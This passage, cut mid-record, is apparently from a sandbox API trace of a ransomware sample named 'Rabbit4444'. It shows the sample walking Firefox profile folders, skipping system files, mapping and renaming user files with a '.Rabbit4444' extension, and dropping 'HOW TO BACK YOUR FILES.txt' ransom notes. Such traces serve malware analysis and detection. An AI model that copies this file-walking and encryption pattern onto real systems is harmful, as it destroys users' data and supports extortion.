(lpString="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4") returned 63 [0052.223] lstrlenW (lpString="Rabbit4444") returned 10 [0052.223] lstrcmpiW (lpString1="in.jsonlz4", lpString2="Rabbit4444") returned -1 [0052.223] lstrlenW (lpString=".dll") returned 4 [0052.223] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0052.223] lstrlenW (lpString=".lnk") returned 4 [0052.223] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0052.223] lstrlenW (lpString=".ini") returned 4 [0052.223] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0052.223] lstrlenW (lpString=".sys") returned 4 [0052.223] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0052.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.224] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.224] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14353433732) returned 1 [0052.224] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6760) returned 1 [0052.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0052.224] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0052.224] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d70, lpName=0x0) returned 0x298 [0052.225] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d70) returned 0x70000 [0052.226] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.226] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.226] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.226] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.226] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14353702695) returned 1 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0052.226] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0052.226] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.226] CloseHandle (hObject=0x298) returned 1 [0052.227] CloseHandle (hObject=0x278) returned 1 [0052.227] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Rabbit4444") returned 179 [0052.227] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.227] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8403501, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", cAlternateFileName="15CA1A~1.JSO")) returned 0 [0052.227] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0052.227] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.227] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.228] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.228] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.229] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.229] CloseHandle (hObject=0x278) returned 1 [0052.229] CloseHandle (hObject=0x27c) returned 1 [0052.229] GetCurrentThreadId () returned 0xd98 [0052.229] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6550 [0052.229] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" [0052.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118f48 | out: hHeap=0xe0000) returned 1 [0052.229] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0052.229] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes" [0052.229] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\" [0052.230] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3" [0052.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.231] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.234] FlushFileBuffers (hFile=0x27c) returned 1 [0052.235] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.235] CloseHandle (hObject=0x27c) returned 1 [0052.235] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes") returned 81 [0052.235] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.236] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe873c152, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.236] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.236] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.236] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.236] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe873c152, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.236] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.236] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.236] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.236] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.236] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.236] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe873c152, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe873c152, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8762357, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.236] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.236] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.236] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="events", cAlternateFileName="")) returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.236] lstrcmpiW (lpString1="events", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="Rabbit4444.exe") returned -1 [0052.236] lstrcmpiW (lpString1="events", lpString2=".") returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="..") returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="windows") returned -1 [0052.236] lstrcmpiW (lpString1="events", lpString2="bootmgr") returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="pagefile.sys") returned -1 [0052.236] lstrcmpiW (lpString1="events", lpString2="boot") returned 1 [0052.236] lstrcmpiW (lpString1="events", lpString2="ids.txt") returned -1 [0052.236] lstrcmpiW (lpString1="events", lpString2="NTUSER.DAT") returned -1 [0052.236] lstrcpyW (in: lpString1=0x130ebdc, lpString2="events" | out: lpString1="events") returned="events" [0052.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0052.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x103f58 [0052.237] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf63f0 [0052.237] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2923a75e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="store.json.mozlz4", cAlternateFileName="STOREJ~1.MOZ")) returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="Rabbit4444.exe") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2=".") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="..") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="windows") returned -1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="bootmgr") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="pagefile.sys") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="boot") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="ids.txt") returned 1 [0052.237] lstrcmpiW (lpString1="store.json.mozlz4", lpString2="NTUSER.DAT") returned 1 [0052.237] lstrcpyW (in: lpString1=0x130ebdc, lpString2="store.json.mozlz4" | out: lpString1="store.json.mozlz4") returned="store.json.mozlz4" [0052.237] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4", dwFileAttributes=0x0) returned 1 [0052.237] lstrlenW (lpString="store.json.mozlz4") returned 17 [0052.237] lstrlenW (lpString="Rabbit4444") returned 10 [0052.237] lstrcmpiW (lpString1="son.mozlz4", lpString2="Rabbit4444") returned 1 [0052.237] lstrlenW (lpString=".dll") returned 4 [0052.237] lstrcmpiW (lpString1="zlz4", lpString2=".dll") returned 1 [0052.237] lstrlenW (lpString=".lnk") returned 4 [0052.237] lstrcmpiW (lpString1="zlz4", lpString2=".lnk") returned 1 [0052.237] lstrlenW (lpString=".ini") returned 4 [0052.237] lstrcmpiW (lpString1="zlz4", lpString2=".ini") returned 1 [0052.237] lstrlenW (lpString=".sys") returned 4 [0052.237] lstrcmpiW (lpString1="zlz4", lpString2=".sys") returned 1 [0052.238] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.238] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.238] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14354845196) returned 1 [0052.238] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66) returned 1 [0052.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0052.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101a68 [0052.238] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x298 [0052.239] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x70000 [0052.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0052.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.240] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.240] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0052.240] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14355301664) returned 1 [0052.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0052.242] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101a68 | out: hHeap=0xe0000) returned 1 [0052.242] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.242] CloseHandle (hObject=0x298) returned 1 [0052.243] CloseHandle (hObject=0x278) returned 1 [0052.243] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.Rabbit4444") returned 110 [0052.243] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.243] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2923a75e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="store.json.mozlz4", cAlternateFileName="STOREJ~1.MOZ")) returned 0 [0052.243] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.243] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.245] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.245] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.245] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.245] CloseHandle (hObject=0x278) returned 1 [0052.245] CloseHandle (hObject=0x27c) returned 1 [0052.245] GetCurrentThreadId () returned 0xd98 [0052.245] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0052.245] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" [0052.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103f58 | out: hHeap=0xe0000) returned 1 [0052.245] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0052.245] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" [0052.246] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\" [0052.246] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3" [0052.246] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\events\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.247] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.249] FlushFileBuffers (hFile=0x27c) returned 1 [0052.250] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.250] CloseHandle (hObject=0x27c) returned 1 [0052.251] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned 88 [0052.251] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.251] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe8762357, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 